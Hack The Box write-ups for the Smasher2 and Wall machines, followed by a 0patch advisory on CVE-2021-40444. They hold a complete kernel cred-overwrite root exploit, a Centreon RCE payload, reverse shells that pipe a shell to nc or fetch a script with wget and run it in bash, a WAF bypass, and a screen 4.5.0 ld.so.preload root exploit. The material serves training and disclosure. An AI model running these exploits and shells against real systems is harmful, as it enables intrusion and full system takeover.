	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key	*session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	/* RCU deletion */
	union {
		int non_rcu;			/* Can we skip RCU deletion? */
		struct rcu_head	rcu;		/* RCU deletion hook */
	};
}

We’ll notice that the first 8 integers (representing our uid, gid, saved uid, saved gid, effective uid, effective gid, uid and gid for the virtual file system) are known to us, which represents a reliable pattern to search for in the memory:

	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */

These 8 integers are followed by a variable called securebits:

    unsigned    securebits; /* SUID-less security management */

Then that variable is followed by our capabilities:

    kernel_cap_t    cap_inheritable; /* caps our children can inherit */
    kernel_cap_t    cap_permitted;  /* caps we're permitted */
    kernel_cap_t    cap_effective;  /* caps we can actually use */
    kernel_cap_t    cap_bset;   /* capability bounding set */
    kernel_cap_t    cap_ambient;    /* Ambient capability set */

Since we know the first 8 integers we can search through the memory for that pattern, when we find a valid cred structure pattern we’ll overwrite each integer of the 8 with a 0 and check if our uid changed to 0, we’ll keep doing it until we overwrite the one which belongs to our process, then we’ll overwrite the capabilities with 0xffffffffffffffff and execute /bin/sh. Let’s try to implement the search for cred structures first.
To do that we will get our uid with getuid():

	unsigned int uid = getuid();

Then search for 8 consecutive integers that are equal to our uid, when we find a cred structure we’ll print its pointer and keep searching:

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
			}

		addr++;

	}

pwn.c:

#include <stdio.h>                                                                          
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("[+] PID: %d\n", getpid());
	
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}

	printf("[*] Open OK fd: %d\n", fd);
	
	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);
	
	if (addr == MAP_FAILED){
		perror("[!] Failed to mmap");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);

	unsigned int uid = getuid();

	printf("[*] Current UID: %d\n", uid);

	unsigned int credIt = 0;
	unsigned int credNum = 0;

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
			}

		addr++;

	}

	fflush(stdout);
	
	int stop = getchar();
	return 0;
}

It worked:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 1215
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[*] Current UID: 1000
[*] Cred structure found! ptr: 0x76186484, crednum: 1
[*] Cred structure found! ptr: 0x76186904, crednum: 2
[*] Cred structure found! ptr: 0x76186b44, crednum: 3
[*] Cred structure found! ptr: 0x76186cc4, crednum: 4
[*] Cred structure found! ptr: 0x76186d84, crednum: 5
[*] Cred structure found! ptr: 0x76186fc4, crednum: 6
[*] Cred structure found! ptr: 0x761872c4, crednum: 7
[*] Cred structure found! ptr: 0x76187684, crednum: 8
[*] Cred structure found! ptr: 0x76187984, crednum: 9
[*] Cred structure found! ptr: 0x76187b04, crednum: 10
[*] Cred structure found! ptr: 0x76187bc4, crednum: 11
[*] Cred structure found! ptr: 0x76187c84, crednum: 12
[*] Cred structure found! ptr: 0x77112184, crednum: 13
[*] Cred structure found! ptr: 0x771123c4, crednum: 14
[*] Cred structure found! ptr: 0x77112484, crednum: 15
[*] Cred structure found! ptr: 0x771129c4, crednum: 16
[*] Cred structure found! ptr: 0x77113084, crednum: 17
[*] Cred structure found! ptr: 0x77113144, crednum: 18
[*] Cred structure found! ptr: 0x77113504, crednum: 19
[*] Cred structure found! ptr: 0x77113c84, crednum: 20
[*] Cred structure found! ptr: 0x7714a604, crednum: 21
[*] Cred structure found! ptr: 0x7714aa84, crednum: 22
[*] Cred structure found! ptr: 0x7714ac04, crednum: 23
[*] Cred structure found! ptr: 0x7714afc4, crednum: 24
[*] Cred structure found! ptr: 0x7714ba44, crednum: 25
[*] Cred structure found! ptr: 0xb9327bc4, crednum: 26

dzonerzy@smasher2:/dev/shm$ 

Now we need to overwrite the cred structure that belongs to our process, we’ll keep overwriting every cred structure we find and check our uid, when we overwrite the one that belongs to our process our uid should be 0:

			credIt = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
		
			if (getuid() == 0){
				printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
				break;
			}

pwn.c:

#include <stdio.h>                                                                          
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){

	printf("[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}

	printf("[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("Failed to mmap: ");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);

	unsigned int uid = getuid();
	
	printf("[*] Current UID: %d\n", uid);
	
	unsigned int credIt = 0;
	unsigned int credNum = 0;

	while (((unsigned long)addr) < (mmapStart + size - 0x40)){

		credIt = 0;
	
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
			
				printf("[*] Cred structure found! ptr: %p, crednum: %d\n", addr, credNum);
		
			credIt = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
			addr[credIt++] = 0;
		
			if (getuid() == 0){
				printf("[*] Process cred structure found ptr: %p, crednum: %d\n", addr, credNum);
				break;
			}

			else{
				credIt = 0;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
			}
		}

	addr++;
}

fflush(stdout);

int stop = getchar();
return 0;
}
dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 4773
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[*] Current UID: 1000
[*] Cred structure found! ptr: 0x76186484, crednum: 1
[*] Cred structure found! ptr: 0x76186904, crednum: 2
[*] Cred structure found! ptr: 0x76186b44, crednum: 3
[*] Cred structure found! ptr: 0x76186cc4, crednum: 4
[*] Cred structure found! ptr: 0x76186fc4, crednum: 5
[*] Cred structure found! ptr: 0x76187684, crednum: 6
[*] Cred structure found! ptr: 0x76187bc4, crednum: 7
[*] Cred structure found! ptr: 0x77112184, crednum: 8
[*] Cred structure found! ptr: 0x771123c4, crednum: 9
[*] Cred structure found! ptr: 0x77112484, crednum: 10
[*] Cred structure found! ptr: 0x771129c4, crednum: 11
[*] Cred structure found! ptr: 0x77113084, crednum: 12
[*] Cred structure found! ptr: 0x77113144, crednum: 13
[*] Cred structure found! ptr: 0x77113504, crednum: 14
[*] Cred structure found! ptr: 0x77113c84, crednum: 15
[*] Cred structure found! ptr: 0x7714a484, crednum: 16
[*] Cred structure found! ptr: 0x7714a604, crednum: 17
[*] Cred structure found! ptr: 0x7714a6c4, crednum: 18
[*] Cred structure found! ptr: 0x7714a844, crednum: 19
[*] Cred structure found! ptr: 0x7714a9c4, crednum: 20
[*] Cred structure found! ptr: 0x7714aa84, crednum: 21
[*] Cred structure found! ptr: 0x7714ac04, crednum: 22
[*] Cred structure found! ptr: 0x7714ad84, crednum: 23
[*] Process cred structure found ptr: 0x7714ad84, crednum: 23

dzonerzy@smasher2:/dev/shm$

Great! now what’s left to do is to overwrite the capabilities in our cred structure with 0xffffffffffffffff and execute /bin/sh:

				credIt += 1; 
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;

				execl("/bin/sh","-", (char *)NULL);

pwn.c:

#include <stdio.h>                                                         
#include <stdlib.h>                                                      
#include <sys/types.h>                                                              
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("\033[93m[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("\033[93m[!] Open failed!\n");
		return -1;
	}

	printf("\033[32m[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("\033[93m[!] Failed to mmap !");
		close(fd);
		return -1;
	}

	printf("\033[32m[*] mmap OK address: %lx\n", addr);
	
	unsigned int uid = getuid();
	
	puts("\033[93m[+] Searching for the process cred structure ...");
	
	unsigned int credIt = 0;
	unsigned int credNum = 0;
	
	while (((unsigned long)addr) < (mmapStart + size - 0x40)){
		credIt = 0;
		if(
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid &&
			addr[credIt++] == uid
			){
				credNum++;
				
				credIt = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
				addr[credIt++] = 0;
		
			if (getuid() == 0){
			
				printf("\033[32m[*] Cred structure found ! ptr: %p, crednum: %d\n", addr, credNum);
				puts("\033[32m[*] Got Root");
				puts("\033[32m[+] Spawning a shell");

				credIt += 1; 
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;
				addr[credIt++] = 0xffffffff;

				execl("/bin/sh","-", (char *)NULL);
				puts("\033[93m[!] Execl failed...");
			
				break;
			}
			else{
				
				credIt = 0;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
				addr[credIt++] = uid;
			}
		}
	addr++;
	}

	return 0;
}

And finally:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 1153
[*] Open OK fd: 3
[*] mmap OK address: 42424000
[+] Searching for the process cred structure ...
[*] Cred structure found ! ptr: 0xb60ad084, crednum: 20
[*] Got Root
[+] Spawning a shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare),1000(dzonerzy)
# 




We owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Wall
Next Hack The Box write-up : Hack The Box - Craft

Hack The Box - Wall

By: 0xRick
7 December 2019 at 05:00

Hack The Box - Wall

Quick Summary

Hey guys, today Wall retired and here’s my write-up about it. It was an easy Linux machine with a web application vulnerable to RCE, WAF bypass to be able to exploit that vulnerability and a vulnerable suid binary. It’s a Linux machine and its ip is 10.10.10.157, I added it to /etc/hosts as wall.htb. Let’s jump right in !


Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/wall# nmap -sV -sT -sC -o nmapinitial wall.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-06 13:59 EST
Nmap scan report for wall.htb (10.10.10.157)
Host is up (0.50s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 2e:93:41:04:23:ed:30:50:8d:0d:58:23:de:7f:2c:15 (RSA)
|   256 4f:d5:d3:29:40:52:9e:62:58:36:11:06:72:85:1b:df (ECDSA)
|_  256 21:64:d0:c0:ff:1a:b4:29:0b:49:e1:11:81:b6:73:66 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 241.17 seconds
root@kali:~/Desktop/HTB/boxes/wall# 

We got http on port 80 and ssh on port 22. Let’s check the web service.

Web Enumeration

The index page was just the default apache page:


So I ran gobuster and got these results:

root@kali:~/Desktop/HTB/boxes/wall# gobuster dir -u http://wall.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://wall.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/06 14:08:02 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/monitoring (Status: 401)
/server-status (Status: 403)

The only interesting thing was /monitoring, however that path was protected by basic http authentication:


I didn’t have credentials, I tried bruteforcing them but it didn’t work so I spent sometime enumerating but I couldn’t find the credentials anywhere. Turns out that by changing the request method from GET to POST we can bypass the authentication:

root@kali:~/Desktop/HTB/boxes/wall# curl -X POST http://wall.htb/monitoring/
<h1>This page is not ready yet !</h1>
<h2>We should redirect you to the required page !</h2>

<meta http-equiv="refresh" content="0; URL='/centreon'" />

root@kali:~/Desktop/HTB/boxes/wall# 

The response was a redirection to /centreon:


Centreon is a network, system, applicative supervision and monitoring tool. -github

Bruteforcing the credentials through the login form will require writing a script because there’s a csrf token that changes every request, alternatively we can use the API.
According to the authentication part we can send a POST request to /api/index.php?action=authenticate with the credentials. In case of providing valid credentials it will respond with the authentication token, otherwise it will respond with a 403.
I used wfuzz with darkweb2017-top10000.txt from seclists:

root@kali:~/Desktop/HTB/boxes/wall# wfuzz -c -X POST -d "username=admin&password=FUZZ" -w ./darkweb2017-top10000.txt http://wall.htb/centreon/api/index.php?action=authenticate

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://wall.htb/centreon/api/index.php?action=authenticate
Total requests: 10000
===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================
000000005:   403        0 L      2 W      17 Ch       "qwerty"
000000006:   403        0 L      2 W      17 Ch       "abc123"
000000008:   200        0 L      1 W      60 Ch       "password1"
000000004:   403        0 L      2 W      17 Ch       "password"
000000007:   403        0 L      2 W      17 Ch       "12345678"
000000009:   403        0 L      2 W      17 Ch       "1234567"
000000010:   403        0 L      2 W      17 Ch       "123123"
000000001:   403        0 L      2 W      17 Ch       "123456"
000000002:   403        0 L      2 W      17 Ch       "123456789"
000000003:   403        0 L      2 W      17 Ch       "111111"
000000011:   403        0 L      2 W      17 Ch       "1234567890"
000000012:   403        0 L      2 W      17 Ch       "000000"
000000013:   403        0 L      2 W      17 Ch       "12345"
000000015:   403        0 L      2 W      17 Ch       "1q2w3e4r5t" 
^C
Finishing pending requests...
root@kali:~/Desktop/HTB/boxes/wall# 

password1 resulted in a 200 response so its the right password:



RCE | WAF Bypass –> Shell as www-data

I checked the version of centreon and it was 19.04:


It was vulnerable to RCE (CVE-2019-13024, discovered by the author of the box) and there was an exploit for it:

root@kali:~/Desktop/HTB/boxes/wall# searchsploit centreon
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                                                    |  Path
                                                                                                                                                                                                  | (/usr/share/exploitdb/)
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
----------
 Redacted
----------
Centreon 19.04  - Remote Code Execution                                                                                                                                                           | exploits/php/webapps/47069.py
----------
 Redacted
----------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
root@kali:~/Desktop/HTB/boxes/wall# 

But when I tried to run the exploit I didn’t get a shell:


So I started looking at the exploit code and tried to do it manually.
The vulnerability is in the poller configuration page (/main.get.php?p=60901) :

    poller_configuration_page = url + "/main.get.php?p=60901"

The script attempts to configure a poller and this is the payload that’s sent in the POST request:

    payload_info = {
        "name": "Central",
        "ns_ip_address": "127.0.0.1",
        # this value should be 1 always
        "localhost[localhost]": "1",
        "is_default[is_default]": "0",
        "remote_id": "",
        "ssh_port": "22",
        "init_script": "centengine",
        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),
        "nagiostats_bin": "/usr/sbin/centenginestats",
        "nagios_perfdata": "/var/log/centreon-engine/service-perfdata",
        "centreonbroker_cfg_path": "/etc/centreon-broker",
        "centreonbroker_module_path": "/usr/share/centreon/lib/centreon-broker",
        "centreonbroker_logs_path": "",
        "centreonconnector_path": "/usr/lib64/centreon-connector",
        "init_script_centreontrapd": "centreontrapd",
        "snmp_trapd_path_conf": "/etc/snmp/centreon_traps/",
        "ns_activate[ns_activate]": "1",
        "submitC": "Save",
        "id": "1",
        "o": "c",
        "centreon_token": poller_token,


    }

nagios_bin is the vulnerable parameter:

        # this value contains the payload , you can change it as you want
        "nagios_bin": "ncat -e /bin/bash {0} {1} #".format(ip, port),

I checked the configuration page and looked at the HTML source, nagios_bin is the monitoring engine binary, I tried to inject a command there:


When I tried to save the configuration I got a 403:


That’s because there’s a WAF blocking these attempts, I could bypass the WAF by replacing the spaces in the commands with ${IFS}. I saved the reverse shell payload in a file then I used wget to get the file contents and I piped it to bash.
a:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f 

modified parameter:

"nagios_bin": "wget${IFS}-qO-${IFS}http://10.10.xx.xx/a${IFS}|${IFS}bash;"
root@kali:~/Desktop/HTB/boxes/wall# python exploit.py http://wall.htb/centreon/ admin password1 10.10.xx.xx 1337
[+] Retrieving CSRF token to submit the login form
exploit.py:38: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.

The code that caused this warning is on line 38 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.

  soup = BeautifulSoup(html_content)
[+] Login token is : ba28f431a995b4461731fb394eb01d79
[+] Logged In Sucssfully
[+] Retrieving Poller token
exploit.py:56: UserWarning: No parser was explicitly specified, so I'm using the best available HTML parser for this system ("lxml"). This usually isn't a problem, but if you run this code on another system, or in a different virtual e
nvironment, it may use a different parser and behave differently.

The code that caused this warning is on line 56 of the file exploit.py. To get rid of this warning, pass the additional argument 'features="lxml"' to the BeautifulSoup constructor.

  poller_soup = BeautifulSoup(poller_html)
[+] Poller token is : d5702ae3de1264b0692afcef86074f07
[+] Injecting Done, triggering the payload
[+] Check your netcat listener !
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.xx.xx] from (UNKNOWN) [10.10.10.157] 37862
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ which python             
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@Wall:/usr/local/centreon/www$ ^Z
[1]+  Stopped                 nc -lvnp 1337
root@kali:~/Desktop/HTB/boxes/wall# stty raw -echo 
root@kali:~/Desktop/HTB/boxes/wall# nc -lvnp 1337

www-data@Wall:/usr/local/centreon/www$ export TERM=screen
www-data@Wall:/usr/local/centreon/www$ 

Screen 4.5.0 –> Root Shell –> User & Root Flags

There were two users on the box, shelby and sysmonitor. I couldn’t read the user flag as www-data:

www-data@Wall:/usr/local/centreon/www$ cd /home
www-data@Wall:/home$ ls -al
total 16
drwxr-xr-x  4 root       root       4096 Jul  4 00:38 .
drwxr-xr-x 23 root       root       4096 Jul  4 00:25 ..
drwxr-xr-x  6 shelby     shelby     4096 Jul 30 17:37 shelby
drwxr-xr-x  5 sysmonitor sysmonitor 4096 Jul  6 15:07 sysmonitor
www-data@Wall:/home$ cd shelby
www-data@Wall:/home/shelby$ cat user.txt 
cat: user.txt: Permission denied
www-data@Wall:/home/shelby$

I searched for suid binaries and saw screen-4.5.0, similar to the privesc in Flujab I used this exploit.
The exploit script didn’t work properly so I did it manually, I compiled the binaries on my box: libhax.c:

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}

rootshell.c:

#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
root@kali:~/Desktop/HTB/boxes/wall/privesc# nano libhax.c
root@kali:~/Desktop/HTB/boxes/wall/privesc# nano rootshell.c
root@kali:~/Desktop/HTB/boxes/wall/privesc# gcc -fPIC -shared -ldl -o libhax.so libhax.c
libhax.c: In function dropshell:
libhax.c:7:5: warning: implicit declaration of function chmod [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
root@kali:~/Desktop/HTB/boxes/wall/privesc# gcc -o rootshell rootshell.c
rootshell.c: In function main:
rootshell.c:3:5: warning: implicit declaration of function setuid [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
rootshell.c:4:5: warning: implicit declaration of function setgid [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
rootshell.c:5:5: warning: implicit declaration of function seteuid [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
rootshell.c:6:5: warning: implicit declaration of function setegid [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
rootshell.c:7:5: warning: implicit declaration of function execvp [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
rootshell.c:7:5: warning: too many arguments to built-in function execvp expecting 2 [-Wbuiltin-declaration-mismatch]
root@kali:~/Desktop/HTB/boxes/wall/privesc#

Then I uploaded them to the box and did the rest of the exploit:

www-data@Wall:/home/shelby$ cd /tmp/
www-data@Wall:/tmp$ wget http://10.10.xx.xx/libhax.so
--2019-12-07 00:23:12--  http://10.10.xx.xx/libhax.so
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16144 (16K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  15.77K  11.7KB/s    in 1.3s    

2019-12-07 00:23:14 (11.7 KB/s) - 'libhax.so' saved [16144/16144]

www-data@Wall:/tmp$ wget http://10.10.xx.xx/rootshell
--2019-12-07 00:23:20--  http://10.10.xx.xx/rootshell
Connecting to 10.10.xx.xx:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16832 (16K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  16.44K  16.3KB/s    in 1.0s    

2019-12-07 00:23:22 (16.3 KB/s) - 'rootshell' saved [16832/16832]

www-data@Wall:/tmp$ 
www-data@Wall:/tmp$ cd /etc
www-data@Wall:/etc$ umask 000
www-data@Wall:/etc$ /bin/screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
www-data@Wall:/etc$ /bin/screen-4.5.0 -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

www-data@Wall:/etc$ /tmp/rootshell
# whoami
root
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data),6000(centreon)
# 




And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Heist
Next Hack The Box write-up : Hack The Box - Smasher2

Micropatches for the "File Extension" URL Scheme (CVE-2021-40444)

27 September 2021 at 13:21

 


 

by Mitja Kolsek, the 0patch Team

September 2021 Windows Updates brought a fix for CVE-2021-40444, a critical vulnerability in Windows that allowed a malicious Office document to download a remote executable file and execute it locally upon opening such document. This vulnerability was found under exploitation in the wild.

 

The Vulnerability

Unfortunately, CVE-2021-40444 does not cover just one flaw but two; this can lead to some confusion:

  1. Path traversal in CAB file extraction: The exploit was utilizing this flaw to place a malicious executable file in a known location instead of a randomly-named subfolder, where it would originally be extracted.

  2. "File extension" URL scheme: For some reason, Windows ShellExecute function, a very complex function capable of launching local applications in various ways including via URLs, supported an undocumented URL scheme mapped to registered file extensions on the computer. The exploit was utilizing this "feature" to launch the previously downloaded executable file with the Control Panel application and have it executed via URL ".cpl:../../../../../Temp/championship.cpl". In this case, ".cpl" was considered a URL scheme, and since .cpl extension is associated with control.exe, this app would get launched and given the provided path as an argument.

The second flaw is the more critical one, as there may exist various other ways to get a malicious file on user's computer (e.g., via the Downloads folder) and still exploit this second flaw to execute such file.

 

Microsoft's Patch

What Microsoft's patch did was add a check before calling ShellExecute on the provided URL to block URL schemes beginning with a non-alphanumeric character - blocking schemes beginning with a dot such as ".cpl" -, and further limiting the allowed set of characters for the remaining string.

Note that ShellExecute function itself was not patched, and you can still launch a DLL via the Control Panel app by clicking the Windows Start button and typing in a ".cpl:/..." URL. Effectively, therefore, support for the "File extension" URL scheme was not eliminated across entire Windows, just made inaccessible from applications utilizing Internet Explorer components for opening URLs. Hopefully remotely delivered content can't find some other way towards ShellExecute that bypasses this new security check.


Our Micropatch

Microsoft's update fixed both flaws, but we decided to only patch the "File extension" URL scheme flaw until someone demonstrates the first flaw to be exploitable by itself.

The "File extension" URL scheme flaw was actually present in two places, in mshtml.dll (reachable from Office documents) and in ieframe.dll (reachable from Internet Explorer), so we had to patch both these executables.

Since an official vendor fix is available, it was our goal to provide patches for affected Windows versions that we have "security-adopted", as they're not receiving official vendor patches anymore. Among these, our tests have shown that only Windows 10 v1803 and v1809 were affected; the File Extension URL scheme "feature" was apparently added in Windows 8.1.

We expect many Windows 10 v1903 machines out there may also be affected, so we decided to port the micropatch to this version as well.

Our CVE-2021-40444 micropatches are therefore available for: 

  1. Windows 10 v1803 32bit or 64bit (updated with May 2021 Updates - latest before end of support)
  2. Windows 10 v1809 32bit or 64bit (updated with May 2021 Updates - latest before end of support) 
  3. Windows 10 v1903 32bit or 64bit (updated with December 2020 Updates - latest before end of support) 


